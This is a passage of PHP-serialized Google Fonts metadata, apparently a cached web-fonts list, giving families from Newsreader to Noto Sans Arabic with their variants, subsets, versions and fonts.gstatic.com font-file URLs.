ttf\";s:9:\"700italic\";s:114:\"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMzPSOZAHDWwgECi.ttf\";s:9:\"800italic\";s:114:\"http://fonts.gstatic.com/s/newsreader/v19/cY9kfjOCX1hbuyalUrK439vogqC9yFZCYg7oRZaLP4obnf7fTXglsMyoSOZAHDWwgECi.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:813;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Niconne\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/niconne/v15/w8gaH2QvRug1_rTfrQut2F4OuOo.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:814;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Niramit\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"200\";s:74:\"http://fonts.gstatic.com/s/niramit/v10/I_urMpWdvgLdNxVLVXx7tiiEr5_BdZ8.ttf\";s:9:\"200italic\";s:77:\"http://fonts.gstatic.com/s/niramit/v10/I_upMpWdvgLdNxVLXbZiXimOq73EZZ_f6w.ttf\";s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/niramit/v10/I_urMpWdvgLdNxVLVRh4tiiEr5_BdZ8.ttf\";s:9:\"300italic\";s:77:\"http://fonts.gstatic.com/s/niramit/v10/I_upMpWdvgLdNxVLXbZiOiqOq73EZZ_f6w.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/niramit/v10/I_uuMpWdvgLdNxVLbbRQkiCvs5Y.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/niramit/v10/I_usMpWdvgLdNxVLXbZalgKqo5bYbA.ttf\";s:3:\"500\";s:74:\"http://fonts.gstatic.com/s/niramit/v10/I_urMpWdvgLdNxVLVUB5tiiEr5_BdZ8.ttf\";s:9:\"500italic\";s:77:\"http://fonts.gstatic.com/s/niramit/v10/I_upMpWdvgLdNxVLXbZiYiuOq73EZZ_f6w.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/niramit/v10/I_urMpWdvgLdNxVLVWx-tiiEr5_BdZ8.ttf\";s:9:\"600italic\";s:77:\"http://fonts.gstatic.com/s/niramit/v10/I_upMpWdvgLdNxVLXbZiTiyOq73EZZ_f6w.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/niramit/v10/I_urMpWdvgLdNxVLVQh_tiiEr5_BdZ8.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/niramit/v10/I_upMpWdvgLdNxVLXbZiKi2Oq73EZZ_f6w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:815;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Nixie One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/nixieone/v16/lW-8wjkKLXjg5y2o2uUoUOFzpS-yLw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:816;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Nobile\";s:8:\"variants\";a:6:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":6:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/nobile/v17/m8JTjflSeaOVl1i2XqfXeLVdbw.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/nobile/v17/m8JRjflSeaOVl1iGXK3TWrBNb3OD.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/nobile/v17/m8JQjflSeaOVl1iOqo7zcJ5BZmqa3A.ttf\";s:9:\"500italic\";s:74:\"http://fonts.gstatic.com/s/nobile/v17/m8JWjflSeaOVl1iGXJUnc5RFRG-K3Mud.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/nobile/v17/m8JQjflSeaOVl1iO4ojzcJ5BZmqa3A.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/nobile/v17/m8JWjflSeaOVl1iGXJVvdZRFRG-K3Mud.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:817;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Nokora\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"700\";i:4;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v30\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"100\";s:71:\"http://fonts.gstatic.com/s/nokora/v30/~CgoKBk5va29yYRhkIAAqBAgBGAE=.ttf\";s:3:\"300\";s:71:\"http://fonts.gstatic.com/s/nokora/v30/~CgsKBk5va29yYRisAiAAKgQIARgB.ttf\";s:7:\"regular\";s:67:\"http://fonts.gstatic.com/s/nokora/v30/~CggKBk5va29yYSAAKgQIARgB.ttf\";s:3:\"700\";s:71:\"http://fonts.gstatic.com/s/nokora/v30/~CgsKBk5va29yYRi8BSAAKgQIARgB.ttf\";s:3:\"900\";s:71:\"http://fonts.gstatic.com/s/nokora/v30/~CgsKBk5va29yYRiEByAAKgQIARgB.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:818;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Norican\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/norican/v14/MwQ2bhXp1eSBqjkPGJJRtGs-lbA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:819;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Nosifer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/nosifer/v20/ZGjXol5JTp0g5bxZaC1RVDNdGDs.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:820;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Notable\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/notable/v14/gNMEW3N_SIqx-WX9-HMoFIez5MI.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:821;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Nothing You Could Do\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/nothingyoucoulddo/v15/oY1B8fbBpaP5OX3DtrRYf_Q2BPB1SnfZb0OJl1ol2Ymo.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:822;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Noticia Text\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/noticiatext/v15/VuJ2dNDF2Yv9qppOePKYRP1GYTFZt0rNpQ.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/noticiatext/v15/VuJodNDF2Yv9qppOePKYRP12YztdlU_dpSjt.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/noticiatext/v15/VuJpdNDF2Yv9qppOePKYRP1-3R59v2HRrDH0eA.ttf\";s:9:\"700italic\";s:87:\"http://fonts.gstatic.com/s/noticiatext/v15/VuJrdNDF2Yv9qppOePKYRP12YwPhumvVjjTkeMnz.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:823;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Color Emoji\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"emoji\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-09-14\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notocoloremoji/v22/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFab5s79iz64w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:824;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Noto Emoji\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"emoji\";}s:7:\"version\";s:3:\"v32\";s:12:\"lastModified\";s:10:\"2022-09-13\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:93:\"http://fonts.gstatic.com/s/notoemoji/v32/bMrnmSyK7YY-MEu6aWjPDs-ar6uWaGWuob_10jwvS-FGJCMY.ttf\";s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/notoemoji/v32/bMrnmSyK7YY-MEu6aWjPDs-ar6uWaGWuob-r0jwvS-FGJCMY.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/notoemoji/v32/bMrnmSyK7YY-MEu6aWjPDs-ar6uWaGWuob-Z0jwvS-FGJCMY.ttf\";s:3:\"600\";s:93:\"http://fonts.gstatic.com/s/notoemoji/v32/bMrnmSyK7YY-MEu6aWjPDs-ar6uWaGWuob911TwvS-FGJCMY.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/notoemoji/v32/bMrnmSyK7YY-MEu6aWjPDs-ar6uWaGWuob9M1TwvS-FGJCMY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:825;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Kufi Arabic\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:6:\"arabic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:106:\"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh5v3obPnLSmf5yD.ttf\";s:3:\"200\";s:106:\"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh7v34bPnLSmf5yD.ttf\";s:3:\"300\";s:106:\"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh4x34bPnLSmf5yD.ttf\";s:7:\"regular\";s:106:\"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh5v34bPnLSmf5yD.ttf\";s:3:\"500\";s:106:\"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh5d34bPnLSmf5yD.ttf\";s:3:\"600\";s:106:\"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh6x2IbPnLSmf5yD.ttf\";s:3:\"700\";s:106:\"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh6I2IbPnLSmf5yD.ttf\";s:3:\"800\";s:106:\"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh7v2IbPnLSmf5yD.ttf\";s:3:\"900\";s:106:\"http://fonts.gstatic.com/s/notokufiarabic/v15/CSRp4ydQnPyaDxEXLFF6LZVLKrodhu8t57o1kDc5Wh7G2IbPnLSmf5yD.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:826;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Noto Music\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"music\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/notomusic/v14/pe0rMIiSN5pO63htf1sxIteQB9Zra1U.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:827;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Naskh Arabic\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:6:\"arabic\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/notonaskharabic/v18/RrQ5bpV-9Dd1b1OAGA6M9PkyDuVBePeKNaxcsss0Y7bwvc5krK0z9_Mnuw.ttf\";s:3:\"500\";s:109:\"http://fonts.gstatic.com/s/notonaskharabic/v18/RrQ5bpV-9Dd1b1OAGA6M9PkyDuVBePeKNaxcsss0Y7bwj85krK0z9_Mnuw.ttf\";s:3:\"600\";s:109:\"http://fonts.gstatic.com/s/notonaskharabic/v18/RrQ5bpV-9Dd1b1OAGA6M9PkyDuVBePeKNaxcsss0Y7bwY8lkrK0z9_Mnuw.ttf\";s:3:\"700\";s:109:\"http://fonts.gstatic.com/s/notonaskharabic/v18/RrQ5bpV-9Dd1b1OAGA6M9PkyDuVBePeKNaxcsss0Y7bwWslkrK0z9_Mnuw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:828;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Nastaliq Urdu\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:6:\"arabic\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notonastaliqurdu/v12/LhW4MUPbN-oZdNFcBy1-DJYsEoTq5puHSPANO9blOA.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/notonastaliqurdu/v12/LhW7MUPbN-oZdNFcBy1-DJYsEoTq5pu_9N8pM_35MVRvQw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:829;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Rashi Hebrew\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:109:\"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZB-DkRyq6Nf2pfA.ttf\";s:3:\"200\";s:109:\"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZh-HkRyq6Nf2pfA.ttf\";s:3:\"300\";s:109:\"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZWeHkRyq6Nf2pfA.ttf\";s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZB-HkRyq6Nf2pfA.ttf\";s:3:\"500\";s:109:\"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZNeHkRyq6Nf2pfA.ttf\";s:3:\"600\";s:109:\"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZ2ebkRyq6Nf2pfA.ttf\";s:3:\"700\";s:109:\"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZ4ObkRyq6Nf2pfA.ttf\";s:3:\"800\";s:109:\"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZh-bkRyq6Nf2pfA.ttf\";s:3:\"900\";s:109:\"http://fonts.gstatic.com/s/notorashihebrew/v21/EJR_Qh82XsIK-QFmqXk4zvLwFVya0vFL-HlKM5e6C6HZrubkRyq6Nf2pfA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:830;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Noto Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:10:\"devanagari\";i:3;s:5:\"greek\";i:4;s:9:\"greek-ext\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:76:\"http://fonts.gstatic.com/s/notosans/v27/o-0OIpQlx3QUlC5A4PNjhjRFSfiM7HBj.ttf\";s:9:\"100italic\";s:79:\"http://fonts.gstatic.com/s/notosans/v27/o-0MIpQlx3QUlC5A4PNr4AwhQ_yu6WBjJLE.ttf\";s:3:\"200\";s:78:\"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjKhVlY9aA5Wl6PQ.ttf\";s:9:\"200italic\";s:80:\"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AyNYtyEx2xqPaif.ttf\";s:3:\"300\";s:78:\"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjThZlY9aA5Wl6PQ.ttf\";s:9:\"300italic\";s:80:\"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AzpYdyEx2xqPaif.ttf\";s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/notosans/v27/o-0IIpQlx3QUlC5A4PNb4j5Ba_2c7A.ttf\";s:6:\"italic\";s:76:\"http://fonts.gstatic.com/s/notosans/v27/o-0OIpQlx3QUlC5A4PNr4DRFSfiM7HBj.ttf\";s:3:\"500\";s:78:\"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjFhdlY9aA5Wl6PQ.ttf\";s:9:\"500italic\";s:80:\"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AyxYNyEx2xqPaif.ttf\";s:3:\"600\";s:78:\"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjOhBlY9aA5Wl6PQ.ttf\";s:9:\"600italic\";s:80:\"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AydZ9yEx2xqPaif.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjXhFlY9aA5Wl6PQ.ttf\";s:9:\"700italic\";s:80:\"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4Az5ZtyEx2xqPaif.ttf\";s:3:\"800\";s:78:\"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjQhJlY9aA5Wl6PQ.ttf\";s:9:\"800italic\";s:80:\"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AzlZdyEx2xqPaif.ttf\";s:3:\"900\";s:78:\"http://fonts.gstatic.com/s/notosans/v27/o-0NIpQlx3QUlC5A4PNjZhNlY9aA5Wl6PQ.ttf\";s:9:\"900italic\";s:80:\"http://fonts.gstatic.com/s/notosans/v27/o-0TIpQlx3QUlC5A4PNr4AzBZNyEx2xqPaif.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:831;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Adlam\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"adlam\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/notosansadlam/v19/neIczCCpqp0s5pPusPamd81eMfjPonvqdbYxxpgufnv0TGnBZLwhuvk.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/notosansadlam/v19/neIczCCpqp0s5pPusPamd81eMfjPonvqdbYxxpgufkn0TGnBZLwhuvk.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/notosansadlam/v19/neIczCCpqp0s5pPusPamd81eMfjPonvqdbYxxpgufqXzTGnBZLwhuvk.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/notosansadlam/v19/neIczCCpqp0s5pPusPamd81eMfjPonvqdbYxxpgufpzzTGnBZLwhuvk.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:832;O:8:\"stdClass\":8:{s:6:\"family\";s:24:\"Noto Sans Adlam Unjoined\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"adlam\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:124:\"http://fonts.gstatic.com/s/notosansadlamunjoined/v19/P5sszY2MYsLRsB5_ildkzPPDsLQXcOEmaFOqOGcaYrzFTIjsPam_Ye35PMEe-E3slUg.ttf\";s:3:\"500\";s:124:\"http://fonts.gstatic.com/s/notosansadlamunjoined/v19/P5sszY2MYsLRsB5_ildkzPPDsLQXcOEmaFOqOGcaYrzFTIjsPam_Yd_5PMEe-E3slUg.ttf\";s:3:\"600\";s:124:\"http://fonts.gstatic.com/s/notosansadlamunjoined/v19/P5sszY2MYsLRsB5_ildkzPPDsLQXcOEmaFOqOGcaYrzFTIjsPam_YTP-PMEe-E3slUg.ttf\";s:3:\"700\";s:124:\"http://fonts.gstatic.com/s/notosansadlamunjoined/v19/P5sszY2MYsLRsB5_ildkzPPDsLQXcOEmaFOqOGcaYrzFTIjsPam_YQr-PMEe-E3slUg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:833;O:8:\"stdClass\":8:{s:6:\"family\";s:31:\"Noto Sans Anatolian Hieroglyphs\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:21:\"anatolian-hieroglyphs\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:123:\"http://fonts.gstatic.com/s/notosansanatolianhieroglyphs/v14/ijw9s4roRME5LLRxjsRb8A0gKPSWq4BbDmHHu6j2pEtUJzZWXybIymc5QYo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:834;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Arabic\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:6:\"arabic\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:124:\"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfyG2vu3CBFQLaig.ttf\";s:3:\"200\";s:124:\"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfSGyvu3CBFQLaig.ttf\";s:3:\"300\";s:124:\"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCflmyvu3CBFQLaig.ttf\";s:7:\"regular\";s:124:\"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfyGyvu3CBFQLaig.ttf\";s:3:\"500\";s:124:\"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCf